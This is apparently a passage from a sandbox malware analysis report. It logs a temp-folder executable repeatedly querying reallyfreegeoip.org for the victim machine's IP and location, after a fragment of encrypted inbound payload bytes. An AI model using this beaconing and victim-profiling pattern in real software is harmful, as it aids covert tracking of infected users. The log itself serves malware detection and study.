2024-12-02 15:15:00 UTC	1390	IN	Data Raw: 6b 94 46 d1 a4 ef c1 08 b4 6b 20 22 02 46 b9 f7 eb 96 38 50 8c b8 58 a1 9a 46 fb 18 a2 92 03 32 ec f0 2e 5d 11 6d 27 0c 7e 93 13 4b 53 73 e0 2c 5f b3 e5 54 2e 84 1f e7 65 fb 16 5e 73 a2 fc 92 db b1 9d cf 79 59 88 c5 49 96 6f c3 ae c4 d3 10 a0 0c db 21 9e ad 72 78 a6 b3 fe 7a 4c 7f da 3f 04 87 9a e7 ff aa 4a 99 a9 fb 61 58 e7 a9 b6 ed 74 b0 f9 e7 f3 87 7f 43 80 74 54 ba d6 1f e4 66 64 57 10 48 81 32 ac 9e b6 91 0c 03 a6 35 10 92 36 2c f9 96 ac f0 52 10 43 6e 8e b0 bf 3c 77 f0 88 91 b0 a9 33 5e de 98 6f 3e ba 81 2d 0e b5 9b 37 7e 61 54 47 6f 12 13 0c e4 3c 8c 47 8f b7 ee e0 f5 17 85 a2 42 c7 0b 37 1b be 82 96 ac fa 85 77 01 8a f7 e4 56 ab 25 f2 de 1f 35 77 03 84 13 81 cd b1 e7 49 15 be 66 b0 91 a8 15 cb e3 2e 99 45 89 5d 7d 78 f7 ab 75 78 97 da c4 fa b3 d9 Data Ascii: kFk "F8PXF2.]m'~KSs,_T.e^syYIo!rxzL?JaXtCtTfdWH256,RCn<w3^o>-7~aTGo<GB7wV%5wIf.E]}xux
2024-12-02 15:15:00 UTC	1390	IN	Data Raw: 11 42 67 e7 0a 6e 58 6c 79 03 b1 5d a5 84 ef ea 07 16 5f 2d 46 ee 99 b9 87 43 be 4d 41 9d cc 09 fd 9a 42 d9 c0 80 89 84 1d 20 f0 2f 72 07 0e a3 64 44 e3 b1 6a 3a 60 54 2c 5b ca fb 71 36 fc b9 24 65 8b be 7b 7b cd d5 9e b4 7b 3f ea 69 2b b2 ca 26 29 cd eb d1 c4 0d 0a 96 07 f9 09 e8 a7 61 61 a6 bb 9c 76 4c 75 2c 48 04 87 90 e7 ff aa 40 99 a9 fb 02 19 97 1c d0 fb 2c 4f e6 e7 f9 95 a9 0b 93 60 4f bf cc 9a a5 66 64 4e b5 36 81 32 ab bb 7e f3 5e 3e 92 45 b2 bd 32 20 4d be ce fa f0 3f 85 1c 47 be bf 32 e2 d5 91 eb fa ca 31 5a 0c ab 5d cd 91 82 27 68 e9 bf 3f 25 50 71 6b 37 ad bb 50 96 bf 98 62 e9 67 b1 80 f5 67 2d 94 40 91 89 37 1b b0 52 de a4 88 3c 6f 29 7b 55 c1 45 c3 e3 f3 cd 0d 86 44 20 20 38 82 cd d7 6d 1a 0e c0 4c b0 b1 ac bb ee ff 74 6d 50 89 27 df 41 97 Data Ascii: BgnXly]_-FCMAB /rdDj:`T,[q6$e{{{?i+&)aavLu,H@,O`OfdN62~^>E2 M?G21Z]'h?%Pqk7Pbgg-@7R<o){UED 8mLtmP'A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49766	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:10 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-02 15:15:11 UTC	877	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29933 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5HqTjWWi8UDcGikxYc2UPqF1dXFrn6ltJ5MAjO4lbrDmMqM6CtNzEkxkYjcKbIJq%2FV1RyRLAX%2BGi%2FfjMqqhxXJFSxOFC9xYdmzE1X8pl8UsMt8gw9V2jaa%2B7NXzYIPa1AlDFMZvk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc455968cb5e5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1731&rtt_var=674&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1593016&cwnd=251&unsent_bytes=0&cid=e34a0b5befa3ecf7&ts=497&x=0"
2024-12-02 15:15:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49772	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:12 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-02 15:15:13 UTC	877	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29936 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MTEFC4YEAa8AS3OyJ8ssOg88DQBlMEU79kZPxiudF%2FoVdTPODkpudaebsL6tqj03mvxOVkkqULg5GBZIBrH%2BaM3t9zcjMlXx7YZbGVvL27KCGk%2Fh9Ik4oQ0veCY0%2Fq0cU1S0n3VM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc4567afe00f37-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1746411&cwnd=139&unsent_bytes=0&cid=6dae6e52328eea89&ts=489&x=0"
2024-12-02 15:15:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49779	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:16 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-02 15:15:16 UTC	885	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29939 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gfHGnIS7Wc4hvD%2BjbsCLXfohAqRidDjtoYViJ%2BEkOj%2B7a5i37f%2B5l0r0AiXjNBAmy3MWcTw%2BQ3s%2F75dpgaIzviOG1J87DygCu1Hf2Zfh02%2F8M88H%2FQBqBoWL4JmI4FoyuMbrXr4l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc457c7fd343b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2181&min_rtt=2175&rtt_var=828&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1312949&cwnd=195&unsent_bytes=0&cid=e4a6dfe1b67026e2&ts=461&x=0"
2024-12-02 15:15:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49790	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:19 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-02 15:15:20 UTC	871	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29943 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xyhg%2BGCPLFm8PP4tMQlFFHmyGHjixpdhSaB7JRPN10Q2qXqjTi25vIkCYohsGJhd0wUzMtRjn1bW3Wq56eehX6siA9X1KuwhXpGf44oUDyoanwJBgvCVZ6A6nkiHgoKOvJvaVljN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc45933b0ec448-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1550&rtt_var=588&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1883870&cwnd=228&unsent_bytes=0&cid=cf25c2594eab2f8e&ts=475&x=0"
2024-12-02 15:15:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49797	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:23 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-02 15:15:23 UTC	875	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29946 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tn3VDpshP662CseSnleDZmK258v9zzT8nh%2Fzz5BPIaT2Wl9kwvKyvpXUcfcWAVw71jBJZrDdBl0%2FfMoZiiTE1Cgnlz8GJUYr4pwOQ6Lf6%2BmCmD8VRlMu8CbfoCyruNCpP6DXaLBP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc45a85a2743bf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1753&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1630374&cwnd=252&unsent_bytes=0&cid=8d771b0caac15f85&ts=473&x=0"
2024-12-02 15:15:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49808	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:26 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-02 15:15:27 UTC	879	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29950 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXPmlRbzbrk8LPKhWBCrG3nFi5ZR7BuaTq6CfFYJ2Jq0QuKnlXb3bfyFoDIX6eH7W7si6MYVBTOmtpyfOtlWEa3%2F2j%2FTfK%2Bm1NwwNEN5QIHI41sc9O7jm0ATo3Y1hKU%2BEB%2FBvLUp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc45bd8b5841e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1742&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1600877&cwnd=243&unsent_bytes=0&cid=743d87ba398d8486&ts=508&x=0"
2024-12-02 15:15:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49818	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:30 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-02 15:15:31 UTC	881	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29954 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWxLXB%2FvfF50ptmSIMf7Oi7A55ELQC2S58WAmISmU0Allsm%2F2ZWGN8QHHB9NKi8fIvzc%2Fo9s6hGKCUeQRA9Tl12oyKlUTDa2RRb5CvrbKyUYFioofPqS9TWxpyVDM9%2B%2BdQVSl%2FSh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc45d86d6f42a0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1742&rtt_var=656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1665715&cwnd=222&unsent_bytes=0&cid=510140540cb0b397&ts=461&x=0"
2024-12-02 15:15:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49826	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:34 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-02 15:15:35 UTC	877	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29957 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQmfHQPJQwJQhFKuVrwwKHoIXAkjCQqaC6mdgeW4sw9TOdfossPYHmqO5%2BGzTmJGVTT21J7U74%2FRgaWP967Sht5R7ZfzK8PMCxMi8ZvUAg1%2B%2FLh08zUidbGfn2NUPBa7j5OVdLSY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc45ef5e8a7cb2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2113&min_rtt=2075&rtt_var=805&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1407228&cwnd=229&unsent_bytes=0&cid=56a5dc21115e3e68&ts=484&x=0"
2024-12-02 15:15:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49834	172.67.177.134	443	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 15:15:38 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-02 15:15:38 UTC	879	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 15:15:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 29961 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iEDeM4N7M8avEF4k6P69wol3PEFffRuFb5xyh8KY6tlr4c%2B%2B92lROUpmwzmXc53khhMJn3TcEbrKcTvgTCn3%2BqKSK1B9YDlc4vNMEZsry6kD1%2F3SzaXjQ9Ydzr4FNy6ZuzVC%2F6gO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebc46049ff543b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1784&rtt_var=677&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1606160&cwnd=236&unsent_bytes=0&cid=55a53b380b1f63de&ts=478&x=0"
